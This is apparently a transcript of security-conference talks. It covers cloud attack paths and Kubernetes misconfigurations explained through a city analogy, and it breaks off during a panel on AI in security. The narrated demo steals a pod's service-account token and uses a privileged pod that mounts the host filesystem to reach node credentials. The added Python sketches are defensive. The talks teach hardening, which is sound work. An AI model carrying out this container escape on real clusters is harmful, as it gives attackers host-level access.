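The attack-path idea can be illustrated with a toy graph search: model each "attacker step" as a directed edge and ask whether the internet can reach the sensitive storage account. All node names and edges below are invented for illustration; real CSPM tools build this graph from live configuration and identity data.

```python
from collections import deque

# Hypothetical environment: an edge A -> B means "an attacker on A can
# move to B" (exposed vulnerable service, reusable identity, stored secret).
edges = {
    "internet": ["vm-web"],        # vm-web is internet-facing and vulnerable
    "vm-web":   ["vm-app"],        # its identity can log into vm-app
    "vm-app":   ["storage-pii"],   # a secret on vm-app opens the storage
    "vm-batch": ["storage-logs"],  # internal-only path, unreachable from outside
}

def attack_path(start: str, target: str):
    # Plain breadth-first search; returns the shortest path found, or None.
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        for nxt in edges.get(path[-1], []):
            if nxt in seen:
                continue
            if nxt == target:
                return path + [nxt]
            seen.add(nxt)
            queue.append(path + [nxt])
    return None

print(attack_path("internet", "storage-pii"))
# → ['internet', 'vm-web', 'vm-app', 'storage-pii']
```

Every hop on the returned path is a candidate choke point: fix the exposed server or revoke the reusable identity and the whole path, not just one finding, disappears.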
So then we come to uh to the key uh takeaways because I know that I gave you a very uh high level overview of everything that's that's happening around the cloud. But I think the first thing you really need to remember is that uh cloud security it is really a team sport. You can't just run it from a security uh uh uh team. You can't just run it from a cloud uh team. You can't run it from a DevOps team. You really need to collaborate each other because the cloud is now so complex. There are so many different capabilities and possibilities in there. There's no way that one team knows everything. So you really need to work together to really
set the boundaries uh uh together for instance in that uh uh secure landing zone. The second part is really governance is really key and so for instance when it comes down to to SAS applications and you really need to govern which applications can be used which applications can't be used but also for your pass and your EAS you really have to have the policies in place that you really want uh uh uh people to follow. What are really the boundaries? What are really the lines where you say okay this can never happen in my environment and then you can really enforce that uh through it but then you need to know what is the governance layer who who has
the the the actual say in in this is this the security team the cloud team or in the ideal situation it's it's a a combined effort then also cloud security it is really a continuous process I still see uh too many times at my customers that they say yeah we have a cloud security project and then I ask okay and how long will that project last yeah there will be some consultants and they will run it for six months they will fix it but then what are you going to do afterwards and there are new threats out there every day so you really need to re-evaluate everything on a continuous uh basis and I think really security is really
the most exciting field to be in. As I said, I started 15 years ago, and the principles of security have always stayed the same: how to protect your data, confidentiality, integrity and availability. But all the technology that you now need to secure has changed, so I really get to learn on a daily basis, and I really enjoy that. So that was my talk. Thank you.
Thank you very much. Are there any questions?
>> So, thank you very much for the presentation. It was very nice to listen to you. I have a question regarding the attack paths that you have shown in the last slide. I would like to know which kind of tool you are using for this, and whether these are really reliable, because it seems quite complex, you know, to identify a complete attack path in a cloud infrastructure that can have thousands of resources, storage accounts, VMs and so on. That looks very complex, and for me that means I'm not sure about the reliability of the existing tools to really show you a complete attack path without any error, for example.
>> Yeah, it is a super good question. I will answer from a Microsoft point of view, because that's the product I know best. This was one of the most difficult things that we did over the last years, because we really had to change the entire layer in which we store our security-related data. In the past, everything was stored in tables, and it's super difficult to correlate all of these tables together. So we changed the entire infrastructure on which we store data to a graph-based database. The tool that I've just showed
is CSPM, cloud security posture management, in combination with exposure management. And yes, it is super difficult to get all of this together, and I think this is also one of the challenges, why it can sometimes be so tricky when you have a lot of different security products that you're utilizing: it's super difficult to correlate them back to each other. So with Microsoft exposure management we also make sure that you can import data from different vendors. It's not possible with all of the vendors out there, because it's not an open API, but we are making efforts to include more and more vendors in
there. But really making sure that you have the right data, deduplicating and so on, is a difficult process. Now we have the first version of it, and it's getting improved quite fast.
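To illustrate why a graph store helps here: once resources and their relations are stored as nodes and edges, an attack path is just a shortest-path search over the graph. This is a minimal sketch with invented resource names and relations, not the product's actual logic:

```python
from collections import deque

# Toy resource graph: node -> list of (relation, neighbour).
# All names below are made up for illustration.
GRAPH = {
    "internet": [("exposes", "vm-web")],
    "vm-web": [("has-identity", "vm-identity")],
    "vm-identity": [("can-read-keys", "storage-account")],
    "storage-account": [],
}

def find_attack_path(graph, start, target):
    """Breadth-first search: shortest chain of nodes an attacker could
    follow from `start` to `target`, or None if no path exists."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for _relation, nxt in graph.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

print(find_attack_path(GRAPH, "internet", "storage-account"))
# -> ['internet', 'vm-web', 'vm-identity', 'storage-account']
```

With tables, the same question requires correlating several joins by hand; in a graph it is one traversal, which is why knowing the path also tells you exactly which edge to cut.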
Anybody else have a question? Okay, I guess it's time for lunch.
>> Okay, is everyone ready now? Cool. Excited for the second half of the day? Yes? Please show how excited you are, especially for the next talk. Okay, that's not really strong excitement, but sure. So, very excited about our next talk. It was actually one of the talks that was really memorable to the whole CFP committee, and it's something that will probably speak to a lot of people in the audience, simply because they want to explain what they do to their kids, and I guess that's sometimes very challenging when you work in security: to actually be
able to translate that to someone who doesn't understand any of the principles. So we're going to talk this time about Kubernetes, which is indeed a kind of gray area for a lot of people, and Lars here is going to present it to you in a very approachable way. So please give a round of applause to our next speaker, Lars Lev. >> Hello. All right, that puts some pressure on, I'll tell you that. Good. Well, welcome everybody. Still a lot of people here, so that's always nice: either you see the interest in Kubernetes security, or you've chosen the wrong room, one of the two. Anyhow, I'll be talking about
what I tell my kids about Kubernetes security. It's not your standard conference talk, I'm well aware of that. But the origin, the idea, kind of has a story attached to it. So let's say it's a normal Monday that you get to work: the normal day-to-day, sometimes boring stuff like team meetings, yada yada yada. But let's say in the afternoon you got that little security incident. Not too bad, but you have to do some investigation, write up a postmortem. Nothing too special. It's all fixed, it's all done. You get home,
you know, put in some slow-cooked meat, make some dinner for the family, all nice. Then the conversation comes up, you're at the dining table with the kids and the wife, or the mister: how was work? I'm sure many of you can relate to that. How was work? And you start talking: yeah, you know, the normal stuff, team meetings, stand-up, blah blah blah. But in the afternoon we had a little security incident where we detected some malicious activity, and one of our pods, one of our containers, was connecting to
a C2 server. It was really weird traffic. So we adapted some egress rules to close off the connection, then we exported the logs we investigated into our analytics platform. And you're so passionate talking about it, and you look up at your wife and she's like: uh, what? And you look at your kids and they're already falling asleep. And then you know you kind of have a problem, or your message is not being delivered very well, right? So that's my main point: how do you take such a, I'll call it
complex (you can make it even more complex, obviously), such a complex technology, and try to explain the security concepts? I will not explain them all, there are just too many. But in a very approachable and very understandable way, using everyday analogies. So that's the main purpose. Yeah, that needs to be turned on. A little bit about myself. I come from the south of the Netherlands, the country of the good chocolate. I love everything that relates to cloud security and application security, I really have a passion for that. I do cloud security at ING, mainly working on the GCP stack
and on the Azure stack, doing some security stuff over there. If I'm not behind my computer doing weird stuff, I tend to play the low notes on my bass from time to time, do some sports as well, padel tennis, and if I don't sleep at night I watch NBA games. That's the main gist of things. Good. Every story starts with "once upon a time", doesn't it? So what we'll do is take the whole Kubernetes concept and relate it to a city. We can see the Kubernetes cluster itself as a city: we'll enter Cubetown. Cubetown is a
little inspired by Amsterdam, I'll tell you that: it has the beautiful canals, it has the bridges. It doesn't have any bikes in the canals, as far as we can see, so that's a good thing. In Cubetown you have a couple of things. You have the city hall, where the mayor resides; some other things are in there as well. You have the city records: the archive of the city is stored there. And Cubetown is all about apartments. We don't do houses, so it's really inspired by Amsterdam: it's all apartment blocks and apartments. If you look closely at the picture, the Kubernetes
concepts are highlighted, very small, so keep them in mind; memorize them if you will. So we have apartments, which are pods. We have namespaces, which are logically separated pieces across nodes. We have the apartment blocks. We have traffic signs: where do we need to ride with our bikes, where do we need to stop? We have the lights. So that's basically Cubetown. Now what we're going to do is: I selected a couple of security-wise scenarios for how we can abuse our city. How can we break stuff in our city? So we're going to look at
abuse cases of our city, and then we're going to check how we can fix them. The first scenario: we have our lovely Suzanne, who rides a little bike. Suzanne is not a citizen; she doesn't live in Cubetown, she's from somewhere else, like Rotterdam. But our city hall is publicly available: you can just take the bike and ride to our city hall, no big deal. No gates, no anything else. She goes to the city hall and says: hey, I want to request an apartment block in Cubetown. How does that look, technically speaking? It looks like this: you have a curl request, you call the
endpoint, the API server of Kubernetes, which is the city hall of Cubetown. You say: hey, I want to do this and this deployment, yada yada yada, some namespace, some name, some properties attached to it. So that's what Suzanne does. What's the response? The response is: sorry Suzanne, it's not going to work. Why is that? It's forbidden. You're in the user group system:unauthenticated, which translated means: you cannot do that. You're not part of Cubetown, get out. It's a very closed city: only people inside of the city can do that. What are the lessons we're learning from that? Well, first of all,
don't make your city hall publicly available. Make it only available for the people living inside your city: only allow requests coming from people inside the city. So we can build a gate, hire guards, build guard rails and all that kind of stuff. In technical terms, that basically means: don't expose your Kubernetes API to the internet. That was a little warm-up, an easy one; the others are going to be harder. Scenario number two: our friend Thomas here lives in an apartment (recall, apartments are our pods). He's a curious guy.
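Suzanne's rejection at the city hall, by the way, can be condensed into a few lines. This is a toy decision function with made-up messages, not the real API server's authorizer:

```python
def authorize(user_groups, anonymous_can_write=False):
    """Toy version of the city hall's decision in scenario one: a request
    whose group is system:unauthenticated is turned away with a 403 unless
    anonymous access has been (unwisely) opened up."""
    if "system:unauthenticated" in user_groups and not anonymous_can_write:
        return (403, "Forbidden: not a citizen of Cubetown")
    return (201, "Created")

# Suzanne cycles in from Rotterdam with no credentials at all:
status, message = authorize(["system:unauthenticated"])
print(status, message)  # -> 403 Forbidden: not a citizen of Cubetown
```

The real gate is simply network reachability plus authentication: if the API server is not exposed, the anonymous request never even arrives.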
And what do curious people do? They look around and see what's in there. What does he find? He finds a little wall where, if you scratch a few things away, there's a hatch towards the building utilities of the apartment block itself: the electricity cabinet, the blueprints of the building. All kinds of nasty information, things you don't want apartment owners to see. So in those terms you could say that the apartment itself is misconfigured: all walls should be properly closed, and it should be isolated from the building utility
services. How does that look in technical terms? There are multiple ways to misconfigure your pod or deployment (a deployment is basically just multiple pods). First of all, there's this one. If you need to name the most famous misconfiguration, it's probably this one (arguably, up for discussion obviously): securityContext with the privileged flag set to true. What does that mean? You have the whole isolation concept of containers: they run in their own little box that is purely isolated. If you set this flag to true, you can throw all your isolation concepts out of the window. It
basically means that your pod, your container, runs on the underlying host itself. So that's a very dangerous property to set. The good thing (it's not all bad in security) is that it's not true by default: it's false by default, you have to explicitly enable it to do stupid things. That's the main gist. So we have the securityContext. Then we have hostNetwork, hostPID and hostIPC, difficult terms. The good thing about these as well: they're not set to true by default, they're also false. So if you just don't do anything, it's fine. What
do those things mean? hostNetwork basically means that your pod, running on the underlying host, can sniff network traffic from all the other services running on that host, which may not be ideal in some cases. You have hostPID, which means host process ID, which means that pods (apartments) running on the underlying host can inspect processes running on that host. For some use cases that may be useful; for most it isn't. And then you have hostIPC, which stands for inter-process communication. That means you can inspect things like shared
memory and all that kind of stuff. It goes a little bit deep, I'm aware. But the main gist is: if you don't need this, just keep it off. Don't do this. Next one. Security people, if you tell them the word root, they always go: uh, what? Containers also have root, obviously, and there are multiple layers to it. One of the layers is: in order to build your container image, you need a thing called a Dockerfile, where you specify some parameters, yada yada yada. And there, if you don't specify anything, your container mostly runs
just as root. So you can specify a certain user that is not zero: you explicitly set in the Dockerfile not to run as root. But then if you move to the manifest itself (this file is used for deployment purposes), there you also have a couple of properties, and I find the first one very confusing: runAsNonRoot. What does that really mean? runAsNonRoot set to true means that even if in your Dockerfile you allow running as root, there's a mismatch: the image says
it will run as root, while the manifest says it must not, and in that case your container will just not start. So make sure to put a user in your Dockerfile (there are other ways to do it as well), specify runAsNonRoot as true here, or just specify a user here as well. That is best practice, obviously: don't enable the root user. There are cases, obviously, where you need to do that, so it's not a silver bullet, "no root, no root". There are cases, like when you deploy security monitoring tools, where you need to
do this. But validate them on a use-case-by-use-case basis. So this is also a misconfiguration, or a possible misconfiguration. All right, another thing: we're talking about volume mounts, and that's a very dangerous one; I'll show you in the demo as well how this works. This one in combination with the privileged flag set to true, the famous one: that's a very dangerous combination. What does this mean? Since the privileged flag is set to true, it runs on the underlying host; the apartment is just part of the entire building block. But if you specify this volume, you basically specify the whole file system. So everything juicy of the apartment
block itself is mounted into my pod. If you specify just a slash (/), that basically means the whole shebang, mounted into my pod under /host. So all the juicy information of my apartment block has been lifted and shifted into my apartment itself, where I can easily inspect it, which is not ideal. But that's in combination with the privileged flag. Good, all those misconfigurations, nasty things: how do we find a solution for that? We can teach the guard at the city hall to check whenever people request an apartment or anything else. We can set up
requirements, call it even legislation if you want to, that say: you need to meet these requirements if you want to build an apartment. If you don't meet the requirements 100%, well, come again later. How can we do that? In technical terms you have multiple things, but one of the important ones is Pod Security Standards. They come in different flavors, more strict and less strict, in how you can apply and enforce them. You have tools like Kyverno (who has heard of Kyverno? Some people, nice) and Open Policy Agent; I think more people have heard of Open Policy Agent. You can
use those admission controllers to set that legislation, to set those rules: if somebody says, hey, I want to create a resource, what are the rules it should comply with, what are the properties you can or cannot set? That's it for scenario number two. You're all still with me, right? Nodding faces, nice. Good, scenario number three: we're talking access control. The mayor of our city of Cubetown holds a golden key, a very famous one; everybody really wants that key, because it can open every door, whether it's the apartment itself or the entire
apartment block. You can even, with the key (don't ask me how), change the traffic lights. A strange key; you can do multiple things with it. Obviously we're talking about access control: somebody who steals the key is able to do basically everything on the cluster. When we talk about access control in Kubernetes, we have a couple of concepts that are very important to understand. The first one is a role. The role by itself is just a role definition. So what's in the properties here? The kind is Role,
you give it a name, like pod-reader, and a namespace (I'll talk about namespaces later). Then in the rules you basically say: I have some verbs, like get, list and watch, which are the actions you can do on a specific resource. So with this role you can get, list and watch pods. It's just the role definition; by itself, you do nothing with it. What you do with a role is assign it to something, and that's where a role binding comes into play. A role binding is: you take the role definition, you take a principal (whether it's a service account, a user or a group, it doesn't really matter), and you combine
those two together, and you get a role binding. So here we specify the role binding and give it a name as well. We've chosen a service account, which is the most common use case I would say, and we link the specific role we just created. Roles and role bindings are namespaced objects. A namespaced object, what the hell is that? Remember the image of my town: there was one layer across two buildings. That was a namespace. A namespace is basically a logically separated (call it a box) area where pods can live. So in the image of our Cubetown we have
floor number one, for example. It's logically separated: the pods can run in different apartments, but it's a piece of its own, basically. So roles and role bindings only apply on a namespace level, in that particular logically separated box. If you say, I don't really care about namespaces, I want to do it for the entire cluster, the full shebang, then cluster roles come into play. Cluster roles are basically the same principle as normal roles, only on cluster level (well, that isn't inherently always the case, but I'll leave that for now). Here I have a cluster role called full-blown-admin. The same things apply: we have resources, we
have verbs. And since we're all security folks: star, star, that's all good news. That's basically everything, in security terms. So this role is the golden key we talked about: you have access to everything, go loose. With a cluster role you obviously have a cluster role binding, the same as with the role and the role binding: you have the cluster role that binds to a certain principal. So the principle is the same; we have the full-blown-admin binding here that binds a service account to a cluster role. Hard question: why is there no namespace here? >> Because cluster roles are on the cluster
level. Think it through, think it through. All right, the resolution: it's basically access control 101, the principle of least privilege. Don't have one big golden key that does everything; make very fine-grained keys, each for its own individual purpose. And don't do stupid things with access control. It's as simple as that; it doesn't always have to be hard. Good. The last one, the one I'm most excited about: it's my favorite scenario. And we've all been there: I'm pretty sure you have some chores to do at your home, or in your city. Well, you do,
you know. I have those hands; I cannot do much myself. So I call someone to do it for me, some plumber or some electrician: hey, can you fix my electricity, it's crap. But those people are, most of the time, in high demand, so they respond: yeah, I can come, but it will take like one year. And I'm like: dude, I cannot wait one year to turn on my heating. So what I do is go on the interwebs, obviously, and start looking for electricity people or plumbing people,
depending on what I need. I search in Google. The first hit I get is advertised, so that basically means it's always good, right? (That's not the case, by the way.) They're called the Super Speed Plumbers. That's good; I need plumbers in my city. Give them a call, they come in. You may already expect it: the Super Speed Plumbers are not the best plumbers in the world. They're nasty; they have other plans as well. So what are we talking about here? We're talking about supply chain attacks. This is a little
deployment YAML, and I'll challenge you to search for the mistake. >> Microsoft. >> It's not Microsoft, right: there's a little typo in between. Maybe it's because you're sitting so close that you see it. But that's something to be very cautious of, and there's a whole plethora of supply chain attacks nowadays. This is just one example: be very cautious of what container image you pull in. Check its integrity, check how it's built and where it comes from; you have multiple frameworks for that. One of the things I'm most excited about is SLSA ("salsa"): Supply-
chain Levels for Software Artifacts. It's amazing; search for it, go for it. It really shows you how you can guard against those types of threats. This is just one simple example, but it makes the point; the whole software supply chain could be a conference on its own. The main idea here, what we want to do to resolve this, is that we should have a trusted list of suppliers that come in. Here I am again with my legislation.
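That trusted list can be sketched as a tiny image-vetting function. The allowlist entries and the typo'd registry below are made up for illustration; real enforcement would live in an admission controller or a registry proxy:

```python
import difflib

# Hypothetical allowlist of registries we trust (made up for this sketch).
TRUSTED_REGISTRIES = {"mcr.microsoft.com", "registry.internal.example"}

def vet_image(image):
    """Allow images only from trusted registries; for anything else,
    point out which trusted name it suspiciously resembles (typosquatting)."""
    registry = image.split("/")[0]
    if registry in TRUSTED_REGISTRIES:
        return "ok"
    lookalike = difflib.get_close_matches(registry, TRUSTED_REGISTRIES,
                                          n=1, cutoff=0.8)
    if lookalike:
        return f"rejected: '{registry}' looks like '{lookalike[0]}'"
    return "rejected: unknown registry"

print(vet_image("mcr.micros0ft.com/app:1.0"))
# -> rejected: 'mcr.micros0ft.com' looks like 'mcr.microsoft.com'
```

The similarity check is exactly the "one little typo in between" trick from the deployment YAML: a registry that is one character off from a trusted one should fail loudly, not pull silently.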
I'm sorry for that. We should make legislation that says: we have an approved list of container images we can use, of suppliers we can get for the chores in our city. We can set up whatever you want, like a proxy server that pulls things in, and we can inspect those kinds of things for what's in there. So we should have that trusted list of container images that we can pull in. Next to that, when they come into our city, we should inspect their toolbox, because there may be nasty devices in there; you never know. That
basically means: check where the container image comes from and where it was built, and do vulnerability scanning on your container images as well. See if anything nasty pops up that you don't want in your production environments. So that's the resolution for number four. Good, still entertained? Now you may ask yourself: yeah, all good and well, Lars, nice stories. But how do we make sure, how do we validate, that those security controls we briefly discussed are in place in our current environments? How do we test it? You know,
because it's good to know the theory, obviously, but without proper validation or security testing, we don't really know. And that's where a tool we built comes in (well, the one who built it is hacking the planet up there). It's called Kate, which stands for Kubernetes Auto Exploitation Tool, and that's the main diagram. It's mainly used to run in non-privileged or non-accessible environments. What it can do is take a service account token, access tokens, user principals, and validate what that particular access token can do, because
nowadays basically every attack in the cloud starts with identity, whether it's a compromised service account or a compromised user account. Basically everything starts with identity, or with the software supply chain; take your pick. So it takes a service account key, uses that to enumerate all the privileges and permissions that it has, and the tool has pre-baked attacks that it executes based on what roles it has. It's very nice; I'll show you. The good thing is, it's compatible with every CSP. Why is that? Because it runs on Kubernetes. So it's Kubernetes-native. That's the only buzzword I'll use.
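The enumerate-then-attack loop behind that can be sketched in a few lines. This is a hypothetical illustration of the approach, not Kate's actual code, and the attack names are invented:

```python
# Map the (verb, resource) pairs a stolen token holds to the
# pre-baked attacks they would enable (names invented for this sketch).
PREBAKED_ATTACKS = {
    ("create", "pods"): "deploy privileged pod with / hostPath mount",
    ("get", "secrets"): "dump all secrets in reachable namespaces",
    ("create", "clusterrolebindings"): "bind own service account to cluster-admin",
}

def plan_attacks(permissions):
    """Given the enumerated (verb, resource) pairs, list applicable attacks."""
    return [attack for perm, attack in PREBAKED_ATTACKS.items()
            if perm in permissions]

print(plan_attacks({("create", "pods"), ("list", "pods")}))
# -> ['deploy privileged pod with / hostPath mount']
```

That is the attacker's mindset in code: first ask "what can I do?", then match the answer against known escalation moves.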
Sorry. So whether you want to run it on AKS, on EKS, on GKE, or on your on-prem Kubernetes, it doesn't really matter; it's applicable to all environments. Good. What's part of the whole setup? If you clone our repository on GitHub, which I advise you to do if you're interested, there is a whole demo setup attached to it. This is the demo setup. Where it comes from: it was set up for a hacking conference in Poland a couple of years ago, and the main idea was that they had to exploit or pentest this
by hand. They have a nice website, a nice UI, where they had to find a command injection vulnerability. Then they had to go into the Sam pod, then discover that the Sam pod has excessive permissions and can do nasty stuff to a different pod; they had to move laterally. So that was quite the attack chain they had to complete. And that's why he made this fully autonomous: with the tool, this whole attack chain can be traversed, and Kate does the exploitation of this
automatically. Good, a little demo of how it works. Demo gods.
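Before the demo: the scenario-two misconfigurations that Kate's malicious pod will rely on can be condensed into a toy audit function. This is an illustrative sketch over a simplified pod-spec dict, not a real admission controller; the field names follow the manifest fields discussed above:

```python
def audit_pod(spec):
    """Return findings for the dangerous settings from scenario two.
    `spec` is a simplified pod spec as a plain dict."""
    findings = []
    # hostNetwork / hostPID / hostIPC: all false by default, all dangerous.
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            findings.append(flag)
    # hostPath volume mounting the host's entire root filesystem.
    for vol in spec.get("volumes", []):
        if vol.get("hostPath", {}).get("path") == "/":
            findings.append("hostPath mounts /")
    for c in spec.get("containers", []):
        ctx = c.get("securityContext", {})
        if ctx.get("privileged"):
            findings.append(f"{c['name']}: privileged")
    return findings

# The nasty combination the demo abuses: privileged plus / mounted in.
malicious = {
    "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
    "containers": [{"name": "kate-malicious",
                    "securityContext": {"privileged": True}}],
}
print(audit_pod(malicious))
# -> ['hostPath mounts /', 'kate-malicious: privileged']
```

An admission controller enforcing Pod Security Standards would reject such a spec outright; the demo works precisely because no such guard is in place.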
All righty. That's a little small, I suppose. Cool. What I have here, already pre-installed because of internet issues, is our cluster. If you want to play around with Kubernetes just for the fun of it, there is a thing called kind. Any people know kind? Yeah, the same ones that know Kyverno, nice. kind stands for Kubernetes in Docker, so it's not a very gentle thing. Well, maybe it is. It's just Kubernetes that you can run locally on your PC. Play around; it doesn't matter if you do stupid things, just delete and rebuild, because the whole thing with Kubernetes is that it's declarative. Everything should
be in code; that's the whole thing. So what I have here: I have the jackpot, which is basically my end goal; I have the Frodo pod in the namespace pro; and I have the Sam pod, also in the pro namespace. Good. How a normal pentest would happen is that they go inside the Sam pod, they exec into it. So they are inside the container, and from there on it's the lay of the land, as they say: you don't have anything, you just need to start playing and see where you
end up. So in order to run Kate, you'll need a service account token, basically a user principal, because you need some identity to test with. So what I did here is exec into the Sam pod and go to that particular file to obtain the token my pod is running with. Good. Then I need the API server; this is basically the address of my city hall. And then I run Kate. See, nice logo. You have a couple of properties here. So what I'll do is: Kate, /u for the URL.
I now know how it feels when 100 people are looking at your screen. -d for the token.
All right, /k. Good, it's starting to do stuff. All very nice, all very fancy. So it's basically iterating: it takes that service account token and looks at what permissions it has. When we talk about access control: those roles, those role bindings, those cluster roles, those cluster role bindings, those are the things it's looking for. What can I do? That's basically every attacker's mindset. When you enter somewhere, it's: what can I do? You look around. What permissions do I have? How can I start escalating, start moving laterally,
start doing nasty and crazy stuff? It does take some time, and I'm not sure it will work, because for the exploit to work (it's basically written here), it needs to create a pod. And how you create a pod is: you take a certain container image from somewhere. Since my internet is not doing very well, I'm not sure it will get the image. But anyhow, you get the idea; I can show you a pre-built recording as well. So here, for the people that are deep in the weeds of Kubernetes: it does self-subject access reviews
to get those permissions, to figure out how to escalate. Yeah, I'm not sure if it will work.
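What that permission enumeration boils down to can be sketched as a toy RBAC evaluator. The role names, subjects and namespaces below are invented for illustration; the real API server's logic is far richer:

```python
# Toy role definitions, echoing the pod-reader and full-blown-admin
# examples from scenario three (names invented for this sketch).
ROLES = {
    "pod-reader": {"verbs": {"get", "list", "watch"}, "resources": {"pods"}},
    "full-blown-admin": {"verbs": {"*"}, "resources": {"*"}},
}

BINDINGS = [
    # A namespaced RoleBinding: the key only opens doors on this floor.
    {"subject": "sa:app", "role": "pod-reader", "namespace": "floor-1"},
    # A ClusterRoleBinding (namespace None): the mayor's golden key.
    {"subject": "sa:mayor", "role": "full-blown-admin", "namespace": None},
]

def allowed(subject, verb, resource, namespace):
    """Does any binding for this subject grant the verb on the resource,
    in this namespace (or everywhere, for cluster scope)?"""
    for b in BINDINGS:
        if b["subject"] != subject:
            continue
        if b["namespace"] is not None and b["namespace"] != namespace:
            continue
        rule = ROLES[b["role"]]
        if (verb in rule["verbs"] or "*" in rule["verbs"]) and \
           (resource in rule["resources"] or "*" in rule["resources"]):
            return True
    return False

print(allowed("sa:app", "get", "pods", "floor-1"))   # -> True
print(allowed("sa:app", "get", "pods", "floor-2"))   # -> False
```

Asking this question for every verb and resource the token might hold is, in essence, what the tool's self-subject access reviews do.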
Let me validate. I was right: it's in ContainerCreating, but it really takes a while, because the internet is not great, at least on my PC. So it found an attack path: it has the permission to create a malicious pod. So it's starting to create a malicious pod here, and that pod will have a very nasty configuration. You remember the privileged flag set to true in combination with the volume mounts, right? Good. It will have that particular combination, so it will be able to access things from the underlying host. That's our end game; that's where we want to be.
It's still in the creating phase. I'll just switch to the recording. It's always good to have a backup plan.
So that's where we were. It's running by itself.
No valid exploits found... then: exploitation starting, exploiting resource pod. All right, here you see my malicious pod has been created: "kate malicious", I'll zoom in for the screen, has been created here. So here it is, running. I do a kubectl exec to get inside of that pod, to see if that particular volume mount, with the proper misconfigurations in place, is mounted into the malicious pod. Ideally, if I go inside the pod, I should see the file system of the host it's running on. So I go in, I cd to /host/etc/kubernetes, and there I can access the kubelet.conf. I'll spare you the details, but the kubelet is something that runs on the node, on the host itself, so from inside a pod I should not be able to access that. So my exploit worked, which is nice. It didn't work in real life, but it worked on the recording. Good. All right. Well, >> that's it. >> Thank you.
>> Awesome. >> Thank you so much for your presentation. Maybe we have a couple of minutes left. So, if we have any questions, does anyone have questions? Yep. >> Uh, so first of all, thank you very much, that was a really great presentation, and thanks for giving me a framework for how to talk to my 20-week-old son about containers one day. Really appreciate it. First question: do you intend to show that demo to your kids as well, and how smart are your kids? >> Well, I'm going to burst a bubble here: I don't have any kids yet. But when they arrive, I'll tell them. >> Awesome. Okay. So, the actual question. I believe I've read that about 60 to 90% of the software running in a container is unused, never loaded into memory, meaning that we have a majorly expanded attack surface with no benefit. I'd love to hear you opine a little bit on that, if you could. >> Come again? I'm not sure I fully understood the question. >> So, the components... you mentioned SLSA for a quick moment there, with software supply chain. About 60 to 90% of the components within containers never get loaded into memory, are never used at runtime. So I'd love to hear a little bit of your thoughts around that. And I'm sorry if I opened a can of worms. >> You opened a can of worms, congratulations on that. Well, first of all, it is true: a lot of things that reside in container images are never used, never loaded into the actual runtime. And we're not going to fix that problem overnight, far from it. But my suggestion would be: there are so many, and I won't mention any commercial players, base images out there that are stripped down to
what you actually need, instead of using RHEL 8 or Debian, you know, the big tractors basically, as the base image for your container. So what I would suggest is: really strip down the base image you build your container image from, because there you already lower the attack surface by some 70%, and then really install, whether it's in your Dockerfile or somewhere else, only the components that you really need. That way you're limiting the attack surface either way, away from noisy vulnerability scanners or whatever. But you opened a can of worms; it's not a problem that will be solved overnight, that's for sure. >> Yeah, we're good. Okay. Maybe one other question? >> Nope, we're good. Okay, perfect. Please give a round of applause to Lars.
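The stripped-down base-image advice from that last answer can be sketched as a multi-stage Dockerfile: build against a full distribution, ship only the binary on a minimal base. The Go toolchain and the `scratch` base are one possible choice for illustration, not an endorsement of any specific vendor:

```dockerfile
# Build stage: the "big tractor" image is fine here, it never ships
FROM golang:1.22 AS build
WORKDIR /src
COPY . .
RUN CGO_ENABLED=0 go build -o /app .

# Runtime stage: nothing but the binary, so there is almost
# nothing unused to scan, exploit, or carry around
FROM scratch
COPY --from=build /app /app
ENTRYPOINT ["/app"]
```

The final image contains only the statically linked binary, which is the point: most of the 60 to 90% of never-loaded components simply never make it into the shipped image.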
putting, and I realized that could have been AI. I don't know if it was for effect, but then I made him realize: should I put AI in as a decision maker for anything? For now, I don't think it's a good idea. So we use it basically for getting insights, and for that alone it is already extremely powerful, right? So yeah, make sure you look at that as well. AI is an assistant, right? It's something that helps you realize something quicker. Vibe coding, anyone? It goes quicker. There just needs to be a human in the loop at one point or another to make that decision or not. I absolutely agree.
>> I do think, yes, AI is an assistant. But I guarantee you, all of your developers are looking at agentic AI in some form or another, and that's going to take off. Getting a handle on that, again, not stopping it, but really having the conversation and talking about it, matters. The analogy I used the other day was: imagine giving dozens of four-year-olds scissors and just letting them run around. That's what you're doing with AI agents; they're just going to go around and start knocking on things and whacking on things, right? And they have access to everything. So getting a handle on that, helping developers understand what the threats of agentic AI are, what agents can do, and then figuring out how to monitor, and making sure that you don't have a bunch of four-year-olds creating more four-year-olds, inviting more four-year-olds over, and giving them all scissors, right? That is going to be a really important thing, because slowly but surely the human is going to come out of the loop, because people are going to say, "Oh, that worked," and just let it run, and it's not going to work. >> I wanted to complement what everyone said here with an aspect that I think we're not thinking about, which is the attacker side. Right? It used to be
that we had a bit of a distinction between state actors, the more sophisticated threat actors, and then some interesting groups here or there that were also fairly sophisticated. Now it seems like everyone has the same power: the types of attacks that we're seeing now are a lot more sophisticated. I was talking the other day to some people in cyber defense in our company, discussing how to improve our filters for a lot of things we have; I can't really talk about it right now. But what I heard from them is that the level of the attacks is a lot higher, and we can definitely see trends: the attacks are pretty similar because of AI, but not exactly the same, and they come from everywhere. There was one day someone was trying to create many types of accounts on a website, pay for a subscription and try to cancel it, using AI to create many different accounts, with many different emails, many different everything, like 100,000 accounts or something. And they were trying, very quickly, in a runtime condition, to get the refund and then use that money before it was realized that they actually hadn't paid for it. It was just a... how do you call it? I forgot the name for it in English, sorry. >> Yeah, it was a race condition. But they were trying to make it look like they had paid and then get the money back quickly, to then spend that money quickly. >> Fraud. >> Yeah, it's fraud, but I was trying to be more specific. You're right. >> Exactly. But then what did we do? We realized that we already had the defenses in place, because we had threat modeling, we had secure design from the start. So product security, or AppSec, whatever you want to call it, is a life cycle thing that you need to think about. In AI it's the same thing: whenever you're going to start with AI, do the whole thing, and you're going to find a lot of issues. We had a situation where we wanted to implement AI in a specific portion of a website, and then realized that a lot of queries were trying to get our AI to say things about Israel and Palestine, or other topics, to make it look like Albertine was making a statement. I'm very glad that we managed to escape that hell, but it could have been really, really bad, right? So attackers are also using it. Don't forget that. If you don't use it, you're going to be left behind. That's actually
